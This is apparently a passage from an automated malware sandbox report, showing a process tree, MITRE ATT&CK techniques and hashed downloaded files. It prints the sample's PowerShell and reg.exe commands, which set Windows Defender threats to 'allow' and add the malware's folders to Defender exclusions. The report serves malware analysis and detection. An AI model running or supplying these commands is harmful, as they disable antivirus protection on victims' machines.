                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe0a734f50,0x7ffe0a734f60,0x7ffe0a734f70
                                                                                                                                1⤵
                                                                                                                                  PID:2132
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4120 -ip 4120
                                                                                                                                  1⤵
                                                                                                                                    PID:3148
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4120 -ip 4120
                                                                                                                                    1⤵
                                                                                                                                      PID:3760
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4120 -ip 4120
                                                                                                                                      1⤵
                                                                                                                                        PID:1060
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4120 -ip 4120
                                                                                                                                        1⤵
                                                                                                                                          PID:4184
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AxCXTNZlIUQioadHG\jcquqnpMowPguoR\VMNfhjS.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\AxCXTNZlIUQioadHG\jcquqnpMowPguoR\VMNfhjS.exe B6 /site_id 525403 /S
                                                                                                                                          1⤵
                                                                                                                                            PID:4016
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                              2⤵
                                                                                                                                                PID:1276
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2820
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3752
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4884
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2540
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1460
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3384
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4560
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3096
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3864
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:740
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3996
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3608
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2752
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3500
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5088
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1808
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4408
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4152
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2460
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3472
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1064
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3536
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2472
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2844
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4380
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EyvKCXDOscGfC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EyvKCXDOscGfC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lMjdckynwwuXnqCqwpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lMjdckynwwuXnqCqwpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQyQgzmlAqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQyQgzmlAqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pKcglgGVfFlU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pKcglgGVfFlU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wJMnPhyPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wJMnPhyPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QpYQOONyFeoLJOVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QpYQOONyFeoLJOVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AxCXTNZlIUQioadHG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AxCXTNZlIUQioadHG\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VBvWfKkPEnIuvBJN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VBvWfKkPEnIuvBJN\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4564
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EyvKCXDOscGfC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4044
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EyvKCXDOscGfC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:216
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EyvKCXDOscGfC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1832
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lMjdckynwwuXnqCqwpR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2820

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Execution

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        Bootkit

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1067

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1089

                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1081

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        4
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Process Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1057

                                                                                                                                                                                                        Collection

                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1005

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          717B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ad4e14783e1f6826e06897a63bd9c145

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          777774173c7df972beec6e3bf988c7629c869aa7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e0d90e2c23683612bb7bd688767c38843641fa51fa844b2feae195aa8ec78c25

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c14d664bd0a4b29dd3431f97fcd4c76844dc6644adfba50743a82af91fb51f520bc72a01f4bd3df3cd82285c52ae741d14fafefc4e88b73b1cc27503cd0ff9c7

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          192B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          98b7e222ef21857b92bfbc9d2520031c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          7a0733c3ed5b73c3dbc85e5676c1e233cc6a43dd

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fe57918171f4d908503fb6af40269f8509d3d154f4e45b88795b605b2938b89f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          591171c8f0cd52725ef4f43f40170371bf85acd89b443659b9f70fb0fc8949fd029f91b65ffbf67459a9a17a2f71a02420998bcc82e0d1ae9addfada76af6eef

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          408B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          8e6eb8b3a16e44cb19e6b32b98102dc7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          17e2bad6a5d11c01dfa83c1e2d3ff74d4c1f4164

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8051584fbd9388c98b832d6a0466675f294d7e02705ba43ee0ba54bd502a9687

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f98a72289d75ab283369e60cf572225037bd852a49912037f609e5bc67a1485f6a4967f275b5808f1a60cacaa67818219f6abe27a26ae8e50bae61f475ca2bb6

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          eff064d0678631bae650b95c390ff6ca

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8a2847dd8e8734fa03376149523471fa20bc9027

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f9caa0fe495a605ff8b1c21667399f88c152bfeec7d0ace433b91bc002dee303

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          31b6c85f7a1fb1c7783cc4bbad5c5b6613cb95c272461c1c51169a35ee6329bc2e03de8dbfceecffec1719aa08de3a987c9de8885db2959f331b2c9b4d15448a

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          eff064d0678631bae650b95c390ff6ca

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8a2847dd8e8734fa03376149523471fa20bc9027

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f9caa0fe495a605ff8b1c21667399f88c152bfeec7d0ace433b91bc002dee303

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          31b6c85f7a1fb1c7783cc4bbad5c5b6613cb95c272461c1c51169a35ee6329bc2e03de8dbfceecffec1719aa08de3a987c9de8885db2959f331b2c9b4d15448a

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDFE.tmp\Install.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          4deb310e2c70911fef38e50b4e12b8af

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          fb40c17d7213d3e90974c8554747771410317e85

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          adbab9c675ff1955c6dc041a3036bab1dd4f35fae10294f4edb61d58bde3215d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          384813994cf80c9d721b7fc2da2f78c5ffa7638a77a90b5de77700f4a5a73c8764288b1dc719a121e6162d078947cbdae52b727b2e8f6f21f515a21d8033a4a1

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCDFE.tmp\Install.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          4deb310e2c70911fef38e50b4e12b8af

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          fb40c17d7213d3e90974c8554747771410317e85

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          adbab9c675ff1955c6dc041a3036bab1dd4f35fae10294f4edb61d58bde3215d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          384813994cf80c9d721b7fc2da2f78c5ffa7638a77a90b5de77700f4a5a73c8764288b1dc719a121e6162d078947cbdae52b727b2e8f6f21f515a21d8033a4a1

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSD745.tmp\Install.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c46371fc47197d7d25e5d51e58394405

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3dd975de1273438b9811d91dfb4367012b7c233b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          dcf44c0096330536f64181b1e04c13647021ede7fde27d096e22803ee5304de1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          2f16df4cfe9407989f0f959499b6787f0a6bb4f30f32052b0562e15a493980d5212256b9fda0161420d490ceb68ac5bbe1a7278c5d6f1ac0f181e3a4019902a5

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSD745.tmp\Install.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c46371fc47197d7d25e5d51e58394405

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3dd975de1273438b9811d91dfb4367012b7c233b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          dcf44c0096330536f64181b1e04c13647021ede7fde27d096e22803ee5304de1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          2f16df4cfe9407989f0f959499b6787f0a6bb4f30f32052b0562e15a493980d5212256b9fda0161420d490ceb68ac5bbe1a7278c5d6f1ac0f181e3a4019902a5

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DASGEFLW.cpL
                                                                                                                                                                                                          Filesize

